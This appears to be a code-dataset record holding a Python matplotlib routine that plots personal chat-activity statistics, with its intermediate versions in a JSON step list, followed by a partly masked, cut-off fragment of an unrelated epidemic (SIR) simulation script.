smooth = possible_smooth[smooth_id]
sum_score = chat_day_data[id][2]
calendar = chat_day_data[id][3]
companion_name = chat_day_data[id][0]
def draw_main_plot_as_all():
first_day = 0
def gen_data():
nonlocal first_day
calendar_dates = list(calendar.keys())
ind = [0]
now = min(calendar_dates)
first_day = now
last = max(calendar_dates)
duration = (last - now).days + 1
need_space_btw_labels = duration // 25
labels = [now]
last_label = 0
t = 0
vals = [0] * duration
vals[0] = calendar[now]
while now != last:
now += datetime.timedelta(days=1)
t += 1
if now in calendar_dates:
ind.append(t)
vals[t] = calendar[now]
if t-last_label >= need_space_btw_labels:
last_label = t
labels.append(str(now))
else:
labels.append("")
def make_smoothie(a, shift):
n = len(a)
res = [0] * n
koef = []
for i in range(shift+1):
koef.append( max(0, math.cos(i/(shift+1))**2*2 - 1) )
for i in range(n):
sum = 0
sum_k = 0
for j in range(-shift, shift+1):
if 0 <= i+j < n:
k = koef[abs(j)]
sum += a[i+j] * k
sum_k += k
res[i] = sum / sum_k
return res
s = int((duration/50)**0.5) #random.randint(0,10)
print(duration, s)
vals = make_smoothie(vals, s)
return ind,labels,vals
width = 1 # default value
plot = main_plot
plot.clear()
ind, labels, vals = gen_data()
plot.set_xticks(ind)
plot.set_xticklabels(labels)
plot.xaxis.set_tick_params(rotation=90)
#plot.bar(ind, vals, width)
plot.bar(range(len(vals)), vals, width)
def format_coord(x, y):
day = int(x + 0.5)
day = first_day + datetime.timedelta(days=day)
#print(day,y)
val = 0
if day in calendar:
val = calendar[day]
if val > 512:
val = str(val // 1024) + "." + str(int((val % 1024 / 102.4 + 0.5)))
val += "Kb"
return str(day) + " " + str(val)
return str(day)
plot.format_coord = format_coord
#plot.set_yscale('log')
def draw_main_plot_as_day():
N = min_in_day // smooth
def set_smooth(score, smooth):
res = [0] * N
for i in range(min_in_day):
res[i//smooth] += score[i]
#res[i] = sum(score[i*smooth:(i+1)*smooth])
return res
me_score = set_smooth(sum_score[0], smooth)
he_score = set_smooth(sum_score[1], smooth)
ind = np.arange(N)
width = 1
def gen_time_labels():
# Set step between labels for they count of be near the 24
k = int(N / 24 + 0.5)
def time(t):
# get time in format `h:mm` from `t` as minute
return str(t//60) + ":" + str(t//10%6)+str(t%10)
labels = [time(x*smooth) if x % k == 0 else ""
for x in range(N)]
return labels
width = 0.8 # default value
plot = main_plot
plot.clear()
plot.set_xticks(ind)
plot.set_xticklabels(gen_time_labels())
plot.xaxis.set_tick_params(rotation=90)
p1 = plot.bar(ind, me_score, width)
p2 = plot.bar(ind, he_score, width, bottom=me_score)
plot.legend((p1[0], p2[0]), (my_name, companion_name))
def format_coord(x,y):
x = int(x+0.5)
if 0 <= x < len(me_score) and me_score[x] + he_score[x]:
rate = me_score[x] / (me_score[x] + he_score[x])
return f"rate: {rate*100:.2f}%"
return None
plot.format_coord = format_coord
def draw_main_plot(mode):
if mode == 0:
draw_main_plot_as_day()
else:
draw_main_plot_as_all()
def draw_pie():
sizes = chat_day_data[id][1]
explode = [0, 0, 0.1]
pie_plot.clear()
def get_angle():
# Set green part (forwarded message) in central bottom part
return -90 + 360*(sizes[2]/(2*sum(sizes)))
pie_plot.pie(sizes, wedgeprops=dict(width=1.0), explode=explode, autopct='%1.1f%%',
shadow=True, startangle=get_angle())
pie_plot.format_coord = lambda x,y: None
def draw_list_chats(id):
chats_above = 4
chats_bottom = 5
if count_of_chats < chats_above + 1 + chats_bottom:
chats_above = id
chats_bottom = count_of_chats - id - 1
if id < chats_above:
chats_bottom += chats_above - id
chats_above = id
if id + chats_bottom >= count_of_chats:
chats_bottom = count_of_chats - id - 1
plot = list_chats_plot
N = chats_above + 1 + chats_bottom
people = []
scores = []
for i in range(-chats_above, chats_bottom+1):
people.append(chat_day_data[i+id][0])
scores.append(sum(chat_day_data[i+id][1]))
selected_chat = [0] * N
selected_chat[chats_above] = scores[chats_above]
plot.clear()
plot.set_yticks(range(N))
plot.set_yticklabels(people)
plot.invert_yaxis()
plot.yaxis.tick_right()
plot.invert_xaxis()
plot.axes.get_xaxis().set_visible(False)
#plot.axes.get_yaxis().set_ticks([])
bars = plot.barh(range(N), scores)
plot.barh(range(N), selected_chat)
plot.format_coord = lambda x,y: None
for bar in bars:
continue
height = bar.get_y() + bar.get_height() / 2
width = bar.get_x() + bar.get_width()
plot.annotate(f' {str(width)[:]}',
xy=(width, height),
ha='left', va='center')
draw_main_plot(main_mode)
draw_pie()
draw_list_chats(id)
plt.draw()
|
normal
|
{
"blob_id": "b297a09ee19bb8069eb65eb085903b3219c6fe5a",
"index": 7971,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef draw_chat(id, smooth_id, main_mode, my_name, chat_day_data, main_plot,\n pie_plot, list_chats_plot):\n min_in_day = 1440\n possible_smooth = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, \n 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 15, 20, 30, 40, 45, 60]\n count_of_chats = len(chat_day_data)\n id = (id + count_of_chats) % count_of_chats\n smooth_id = (smooth_id + len(possible_smooth)) % len(possible_smooth)\n smooth = possible_smooth[smooth_id]\n sum_score = chat_day_data[id][2]\n calendar = chat_day_data[id][3]\n companion_name = chat_day_data[id][0]\n\n def draw_main_plot_as_all():\n first_day = 0\n\n def gen_data():\n nonlocal first_day\n calendar_dates = list(calendar.keys())\n ind = [0]\n now = min(calendar_dates)\n first_day = now\n last = max(calendar_dates)\n duration = (last - now).days + 1\n need_space_btw_labels = duration // 25\n labels = [now]\n last_label = 0\n t = 0\n vals = [0] * duration\n vals[0] = calendar[now]\n while now != last:\n now += datetime.timedelta(days=1)\n t += 1\n if now in calendar_dates:\n ind.append(t)\n vals[t] = calendar[now]\n if t - last_label >= need_space_btw_labels:\n last_label = t\n labels.append(str(now))\n else:\n labels.append('')\n\n def make_smoothie(a, shift):\n n = len(a)\n res = [0] * n\n koef = []\n for i in range(shift + 1):\n koef.append(max(0, math.cos(i / (shift + 1)) ** 2 * 2 - 1))\n for i in range(n):\n sum = 0\n sum_k = 0\n for j in range(-shift, shift + 1):\n if 0 <= i + j < n:\n k = koef[abs(j)]\n sum += a[i + j] * k\n sum_k += k\n res[i] = sum / sum_k\n return res\n s = int((duration / 50) ** 0.5)\n print(duration, s)\n vals = make_smoothie(vals, s)\n return ind, labels, vals\n width = 1\n plot = main_plot\n plot.clear()\n ind, labels, vals = gen_data()\n plot.set_xticks(ind)\n plot.set_xticklabels(labels)\n plot.xaxis.set_tick_params(rotation=90)\n plot.bar(range(len(vals)), vals, width)\n\n def format_coord(x, y):\n day = int(x + 0.5)\n day = first_day + datetime.timedelta(days=day)\n val = 0\n if day in calendar:\n val = calendar[day]\n if val > 512:\n val = str(val // 1024) + '.' + str(int(val % 1024 / \n 102.4 + 0.5))\n val += 'Kb'\n return str(day) + ' ' + str(val)\n return str(day)\n plot.format_coord = format_coord\n\n def draw_main_plot_as_day():\n N = min_in_day // smooth\n\n def set_smooth(score, smooth):\n res = [0] * N\n for i in range(min_in_day):\n res[i // smooth] += score[i]\n return res\n me_score = set_smooth(sum_score[0], smooth)\n he_score = set_smooth(sum_score[1], smooth)\n ind = np.arange(N)\n width = 1\n\n def gen_time_labels():\n k = int(N / 24 + 0.5)\n\n def time(t):\n return str(t // 60) + ':' + str(t // 10 % 6) + str(t % 10)\n labels = [(time(x * smooth) if x % k == 0 else '') for x in\n range(N)]\n return labels\n width = 0.8\n plot = main_plot\n plot.clear()\n plot.set_xticks(ind)\n plot.set_xticklabels(gen_time_labels())\n plot.xaxis.set_tick_params(rotation=90)\n p1 = plot.bar(ind, me_score, width)\n p2 = plot.bar(ind, he_score, width, bottom=me_score)\n plot.legend((p1[0], p2[0]), (my_name, companion_name))\n\n def format_coord(x, y):\n x = int(x + 0.5)\n if 0 <= x < len(me_score) and me_score[x] + he_score[x]:\n rate = me_score[x] / (me_score[x] + he_score[x])\n return f'rate: {rate * 100:.2f}%'\n return None\n plot.format_coord = format_coord\n\n def draw_main_plot(mode):\n if mode == 0:\n draw_main_plot_as_day()\n else:\n draw_main_plot_as_all()\n\n def draw_pie():\n sizes = chat_day_data[id][1]\n explode = [0, 0, 0.1]\n pie_plot.clear()\n\n def get_angle():\n return -90 + 360 * (sizes[2] / (2 * sum(sizes)))\n pie_plot.pie(sizes, wedgeprops=dict(width=1.0), explode=explode,\n autopct='%1.1f%%', shadow=True, startangle=get_angle())\n pie_plot.format_coord = lambda x, y: None\n\n def draw_list_chats(id):\n chats_above = 4\n chats_bottom = 5\n if count_of_chats < chats_above + 1 + chats_bottom:\n chats_above = id\n chats_bottom = count_of_chats - id - 1\n if id < chats_above:\n chats_bottom += chats_above - id\n chats_above = id\n if id + chats_bottom >= count_of_chats:\n chats_bottom = count_of_chats - id - 1\n plot = list_chats_plot\n N = chats_above + 1 + chats_bottom\n people = []\n scores = []\n for i in range(-chats_above, chats_bottom + 1):\n people.append(chat_day_data[i + id][0])\n scores.append(sum(chat_day_data[i + id][1]))\n selected_chat = [0] * N\n selected_chat[chats_above] = scores[chats_above]\n plot.clear()\n plot.set_yticks(range(N))\n plot.set_yticklabels(people)\n plot.invert_yaxis()\n plot.yaxis.tick_right()\n plot.invert_xaxis()\n plot.axes.get_xaxis().set_visible(False)\n bars = plot.barh(range(N), scores)\n plot.barh(range(N), selected_chat)\n plot.format_coord = lambda x, y: None\n for bar in bars:\n continue\n height = bar.get_y() + bar.get_height() / 2\n width = bar.get_x() + bar.get_width()\n plot.annotate(f' {str(width)[:]}', xy=(width, height), ha=\n 'left', va='center')\n draw_main_plot(main_mode)\n draw_pie()\n draw_list_chats(id)\n plt.draw()\n",
"step-3": "import math\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef draw_chat(id, smooth_id, main_mode, my_name, chat_day_data, main_plot,\n pie_plot, list_chats_plot):\n min_in_day = 1440\n possible_smooth = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, \n 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 15, 20, 30, 40, 45, 60]\n count_of_chats = len(chat_day_data)\n id = (id + count_of_chats) % count_of_chats\n smooth_id = (smooth_id + len(possible_smooth)) % len(possible_smooth)\n smooth = possible_smooth[smooth_id]\n sum_score = chat_day_data[id][2]\n calendar = chat_day_data[id][3]\n companion_name = chat_day_data[id][0]\n\n def draw_main_plot_as_all():\n first_day = 0\n\n def gen_data():\n nonlocal first_day\n calendar_dates = list(calendar.keys())\n ind = [0]\n now = min(calendar_dates)\n first_day = now\n last = max(calendar_dates)\n duration = (last - now).days + 1\n need_space_btw_labels = duration // 25\n labels = [now]\n last_label = 0\n t = 0\n vals = [0] * duration\n vals[0] = calendar[now]\n while now != last:\n now += datetime.timedelta(days=1)\n t += 1\n if now in calendar_dates:\n ind.append(t)\n vals[t] = calendar[now]\n if t - last_label >= need_space_btw_labels:\n last_label = t\n labels.append(str(now))\n else:\n labels.append('')\n\n def make_smoothie(a, shift):\n n = len(a)\n res = [0] * n\n koef = []\n for i in range(shift + 1):\n koef.append(max(0, math.cos(i / (shift + 1)) ** 2 * 2 - 1))\n for i in range(n):\n sum = 0\n sum_k = 0\n for j in range(-shift, shift + 1):\n if 0 <= i + j < n:\n k = koef[abs(j)]\n sum += a[i + j] * k\n sum_k += k\n res[i] = sum / sum_k\n return res\n s = int((duration / 50) ** 0.5)\n print(duration, s)\n vals = make_smoothie(vals, s)\n return ind, labels, vals\n width = 1\n plot = main_plot\n plot.clear()\n ind, labels, vals = gen_data()\n plot.set_xticks(ind)\n plot.set_xticklabels(labels)\n plot.xaxis.set_tick_params(rotation=90)\n plot.bar(range(len(vals)), vals, width)\n\n def format_coord(x, y):\n day = int(x + 0.5)\n day = first_day + datetime.timedelta(days=day)\n val = 0\n if day in calendar:\n val = calendar[day]\n if val > 512:\n val = str(val // 1024) + '.' + str(int(val % 1024 / \n 102.4 + 0.5))\n val += 'Kb'\n return str(day) + ' ' + str(val)\n return str(day)\n plot.format_coord = format_coord\n\n def draw_main_plot_as_day():\n N = min_in_day // smooth\n\n def set_smooth(score, smooth):\n res = [0] * N\n for i in range(min_in_day):\n res[i // smooth] += score[i]\n return res\n me_score = set_smooth(sum_score[0], smooth)\n he_score = set_smooth(sum_score[1], smooth)\n ind = np.arange(N)\n width = 1\n\n def gen_time_labels():\n k = int(N / 24 + 0.5)\n\n def time(t):\n return str(t // 60) + ':' + str(t // 10 % 6) + str(t % 10)\n labels = [(time(x * smooth) if x % k == 0 else '') for x in\n range(N)]\n return labels\n width = 0.8\n plot = main_plot\n plot.clear()\n plot.set_xticks(ind)\n plot.set_xticklabels(gen_time_labels())\n plot.xaxis.set_tick_params(rotation=90)\n p1 = plot.bar(ind, me_score, width)\n p2 = plot.bar(ind, he_score, width, bottom=me_score)\n plot.legend((p1[0], p2[0]), (my_name, companion_name))\n\n def format_coord(x, y):\n x = int(x + 0.5)\n if 0 <= x < len(me_score) and me_score[x] + he_score[x]:\n rate = me_score[x] / (me_score[x] + he_score[x])\n return f'rate: {rate * 100:.2f}%'\n return None\n plot.format_coord = format_coord\n\n def draw_main_plot(mode):\n if mode == 0:\n draw_main_plot_as_day()\n else:\n draw_main_plot_as_all()\n\n def draw_pie():\n sizes = chat_day_data[id][1]\n explode = [0, 0, 0.1]\n pie_plot.clear()\n\n def get_angle():\n return -90 + 360 * (sizes[2] / (2 * sum(sizes)))\n pie_plot.pie(sizes, wedgeprops=dict(width=1.0), explode=explode,\n autopct='%1.1f%%', shadow=True, startangle=get_angle())\n pie_plot.format_coord = lambda x, y: None\n\n def draw_list_chats(id):\n chats_above = 4\n chats_bottom = 5\n if count_of_chats < chats_above + 1 + chats_bottom:\n chats_above = id\n chats_bottom = count_of_chats - id - 1\n if id < chats_above:\n chats_bottom += chats_above - id\n chats_above = id\n if id + chats_bottom >= count_of_chats:\n chats_bottom = count_of_chats - id - 1\n plot = list_chats_plot\n N = chats_above + 1 + chats_bottom\n people = []\n scores = []\n for i in range(-chats_above, chats_bottom + 1):\n people.append(chat_day_data[i + id][0])\n scores.append(sum(chat_day_data[i + id][1]))\n selected_chat = [0] * N\n selected_chat[chats_above] = scores[chats_above]\n plot.clear()\n plot.set_yticks(range(N))\n plot.set_yticklabels(people)\n plot.invert_yaxis()\n plot.yaxis.tick_right()\n plot.invert_xaxis()\n plot.axes.get_xaxis().set_visible(False)\n bars = plot.barh(range(N), scores)\n plot.barh(range(N), selected_chat)\n plot.format_coord = lambda x, y: None\n for bar in bars:\n continue\n height = bar.get_y() + bar.get_height() / 2\n width = bar.get_x() + bar.get_width()\n plot.annotate(f' {str(width)[:]}', xy=(width, height), ha=\n 'left', va='center')\n draw_main_plot(main_mode)\n draw_pie()\n draw_list_chats(id)\n plt.draw()\n",
"step-4": "import math\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef draw_chat(\n id, smooth_id, main_mode, \n my_name, chat_day_data, \n main_plot, pie_plot, list_chats_plot):\n\n min_in_day = 1440\n possible_smooth = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]\n possible_smooth = [10, 15, 20, 30, 40, 45, 60] #divisors of 1440 (minutes in day)\n \n\n count_of_chats = len(chat_day_data)\n id = (id + count_of_chats) % count_of_chats\n smooth_id = (smooth_id + len(possible_smooth)) % len(possible_smooth)\n \n smooth = possible_smooth[smooth_id]\n sum_score = chat_day_data[id][2]\n calendar = chat_day_data[id][3]\n companion_name = chat_day_data[id][0]\n \n def draw_main_plot_as_all():\n first_day = 0\n def gen_data():\n nonlocal first_day\n \n calendar_dates = list(calendar.keys())\n ind = [0]\n now = min(calendar_dates)\n first_day = now\n last = max(calendar_dates)\n duration = (last - now).days + 1\n need_space_btw_labels = duration // 25\n labels = [now]\n last_label = 0\n t = 0\n vals = [0] * duration\n vals[0] = calendar[now]\n \n while now != last:\n now += datetime.timedelta(days=1)\n t += 1\n if now in calendar_dates:\n ind.append(t)\n vals[t] = calendar[now]\n if t-last_label >= need_space_btw_labels:\n last_label = t\n labels.append(str(now))\n else:\n labels.append(\"\")\n \n def make_smoothie(a, shift):\n n = len(a)\n res = [0] * n\n \n koef = []\n for i in range(shift+1):\n koef.append( max(0, math.cos(i/(shift+1))**2*2 - 1) )\n \n for i in range(n):\n sum = 0\n sum_k = 0\n for j in range(-shift, shift+1):\n if 0 <= i+j < n:\n k = koef[abs(j)]\n sum += a[i+j] * k\n sum_k += k\n res[i] = sum / sum_k\n return res\n\n s = int((duration/50)**0.5) #random.randint(0,10)\n print(duration, s)\n vals = make_smoothie(vals, s)\n\n return ind,labels,vals\n\n width = 1 # default value\n plot = main_plot\n \n plot.clear()\n ind, labels, vals = gen_data()\n plot.set_xticks(ind)\n plot.set_xticklabels(labels)\n plot.xaxis.set_tick_params(rotation=90)\n #plot.bar(ind, vals, width)\n plot.bar(range(len(vals)), vals, width)\n \n def format_coord(x, y):\n day = int(x + 0.5)\n day = first_day + datetime.timedelta(days=day)\n #print(day,y)\n val = 0\n if day in calendar:\n val = calendar[day]\n if val > 512:\n val = str(val // 1024) + \".\" + str(int((val % 1024 / 102.4 + 0.5)))\n val += \"Kb\"\n return str(day) + \" \" + str(val)\n return str(day)\n\n plot.format_coord = format_coord\n #plot.set_yscale('log')\n\n\n def draw_main_plot_as_day():\n N = min_in_day // smooth\n \n def set_smooth(score, smooth):\n res = [0] * N\n for i in range(min_in_day):\n res[i//smooth] += score[i]\n #res[i] = sum(score[i*smooth:(i+1)*smooth])\n return res\n\n me_score = set_smooth(sum_score[0], smooth)\n he_score = set_smooth(sum_score[1], smooth)\n\n ind = np.arange(N)\n width = 1 \n def gen_time_labels():\n # Set step between labels for they count of be near the 24\n k = int(N / 24 + 0.5) \n\n def time(t):\n # get time in format `h:mm` from `t` as minute\n return str(t//60) + \":\" + str(t//10%6)+str(t%10)\n labels = [time(x*smooth) if x % k == 0 else \"\" \n for x in range(N)]\n return labels \n\n width = 0.8 # default value\n plot = main_plot\n \n plot.clear()\n plot.set_xticks(ind)\n plot.set_xticklabels(gen_time_labels())\n plot.xaxis.set_tick_params(rotation=90)\n p1 = plot.bar(ind, me_score, width)\n p2 = plot.bar(ind, he_score, width, bottom=me_score)\n plot.legend((p1[0], p2[0]), (my_name, companion_name))\n\n def format_coord(x,y):\n x = int(x+0.5)\n if 0 <= x < len(me_score) and me_score[x] + he_score[x]:\n rate = me_score[x] / (me_score[x] + he_score[x])\n return f\"rate: {rate*100:.2f}%\"\n \n return None\n\n plot.format_coord = format_coord\n\n def draw_main_plot(mode):\n if mode == 0:\n draw_main_plot_as_day()\n else:\n draw_main_plot_as_all()\n\n\n def draw_pie():\n sizes = chat_day_data[id][1]\n explode = [0, 0, 0.1] \n pie_plot.clear()\n\n def get_angle():\n # Set green part (forwarded message) in central bottom part\n return -90 + 360*(sizes[2]/(2*sum(sizes)))\n\n pie_plot.pie(sizes, wedgeprops=dict(width=1.0), explode=explode, autopct='%1.1f%%',\n shadow=True, startangle=get_angle())\n pie_plot.format_coord = lambda x,y: None\n \n def draw_list_chats(id):\n chats_above = 4\n chats_bottom = 5\n\n if count_of_chats < chats_above + 1 + chats_bottom:\n chats_above = id\n chats_bottom = count_of_chats - id - 1\n\n if id < chats_above:\n chats_bottom += chats_above - id\n chats_above = id\n if id + chats_bottom >= count_of_chats:\n chats_bottom = count_of_chats - id - 1\n\n plot = list_chats_plot\n N = chats_above + 1 + chats_bottom\n people = []\n scores = []\n for i in range(-chats_above, chats_bottom+1):\n people.append(chat_day_data[i+id][0])\n scores.append(sum(chat_day_data[i+id][1]))\n\n selected_chat = [0] * N\n selected_chat[chats_above] = scores[chats_above]\n\n plot.clear()\n plot.set_yticks(range(N))\n plot.set_yticklabels(people)\n plot.invert_yaxis() \n plot.yaxis.tick_right()\n plot.invert_xaxis()\n plot.axes.get_xaxis().set_visible(False)\n #plot.axes.get_yaxis().set_ticks([])\n\n bars = plot.barh(range(N), scores)\n plot.barh(range(N), selected_chat)\n plot.format_coord = lambda x,y: None\n\n for bar in bars:\n continue\n height = bar.get_y() + bar.get_height() / 2\n width = bar.get_x() + bar.get_width()\n plot.annotate(f' {str(width)[:]}',\n xy=(width, height),\n ha='left', va='center')\n\n\n draw_main_plot(main_mode)\n draw_pie()\n draw_list_chats(id)\n plt.draw()\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=
False, startcorner=False):
"""
run the simulation for the pop
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
recover.append(count_recover(pop))
infect.append(count_infect(pop))
suspect.append(count_suspectial(pop))
newrecover = [(i / N) for i in recover]
newsuspect = [(s / N) for s in suspect]
newinfect = [(i / N) for i in infect]
plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')
plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')
plt.plot(range(T + 1), newinfect, label='i: percentage of infected')
plt.xlabel('T')
plt.ylabel('percentage')
plt.title('Percentage of Population, Discrete')
plt.legend()
plt.show()
<|reserved_special_token_0|>
def checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,
startcorner=False):
"""
we use this function for checking the total infected people
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
np.random.seed(10)
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
return np.array([(count_infect(pop) + count_recover(pop)) / N,
count_infect(pop) / N])
def plotcenterrange():
"""
show how the total infected people i change with p start from center
"""
plist1 = np.arange(0.02, 0.1, 0.02)
plist = np.arange(0.1, 1, 0.1)
infectlist = []
for i in plist1:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
plt.plot(np.hstack((plist1, plist)), infectlist)
plt.title('centerplot')
plt.xlabel('p')
plt.ylabel('total number of individuals infected')
plt.title('Total Number of Individuals Infected vs p')
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('../')
<|reserved_special_token_0|>
def run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=
False, startcorner=False):
"""
run the simulation for the pop
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
recover.append(count_recover(pop))
infect.append(count_infect(pop))
suspect.append(count_suspectial(pop))
newrecover = [(i / N) for i in recover]
newsuspect = [(s / N) for s in suspect]
newinfect = [(i / N) for i in infect]
plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')
plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')
plt.plot(range(T + 1), newinfect, label='i: percentage of infected')
plt.xlabel('T')
plt.ylabel('percentage')
plt.title('Percentage of Population, Discrete')
plt.legend()
plt.show()
run_Simulation2(0.6, N=20000, T=30, start=10)
def checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,
startcorner=False):
"""
we use this function for checking the total infected people
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
np.random.seed(10)
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
return np.array([(count_infect(pop) + count_recover(pop)) / N,
count_infect(pop) / N])
def plotcenterrange():
"""
show how the total infected people i change with p start from center
"""
plist1 = np.arange(0.02, 0.1, 0.02)
plist = np.arange(0.1, 1, 0.1)
infectlist = []
for i in plist1:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
plt.plot(np.hstack((plist1, plist)), infectlist)
plt.title('centerplot')
plt.xlabel('p')
plt.ylabel('total number of individuals infected')
plt.title('Total Number of Individuals Infected vs p')
plt.show()
plotcenterrange()
<|reserved_special_token_0|>
print('p = 0.05, starting randomly, the total infected number is ' + str(
valuerandom))
print('p = 0.05, starting from corner, the total infected number is ' + str
(valuecorner))
print('p = 0.05, starting from center, the total infected number is ' + str
(valuecenter))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('../')
<|reserved_special_token_0|>
p = Person()
def run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=
False, startcorner=False):
"""
run the simulation for the pop
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
recover.append(count_recover(pop))
infect.append(count_infect(pop))
suspect.append(count_suspectial(pop))
newrecover = [(i / N) for i in recover]
newsuspect = [(s / N) for s in suspect]
newinfect = [(i / N) for i in infect]
plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')
plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')
plt.plot(range(T + 1), newinfect, label='i: percentage of infected')
plt.xlabel('T')
plt.ylabel('percentage')
plt.title('Percentage of Population, Discrete')
plt.legend()
plt.show()
run_Simulation2(0.6, N=20000, T=30, start=10)
def checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,
startcorner=False):
"""
we use this function for checking the total infected people
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
np.random.seed(10)
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
return np.array([(count_infect(pop) + count_recover(pop)) / N,
count_infect(pop) / N])
def plotcenterrange():
"""
show how the total infected people i change with p start from center
"""
plist1 = np.arange(0.02, 0.1, 0.02)
plist = np.arange(0.1, 1, 0.1)
infectlist = []
for i in plist1:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
plt.plot(np.hstack((plist1, plist)), infectlist)
plt.title('centerplot')
plt.xlabel('p')
plt.ylabel('total number of individuals infected')
plt.title('Total Number of Individuals Infected vs p')
plt.show()
plotcenterrange()
<|reserved_special_token_0|>
valuecorner = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
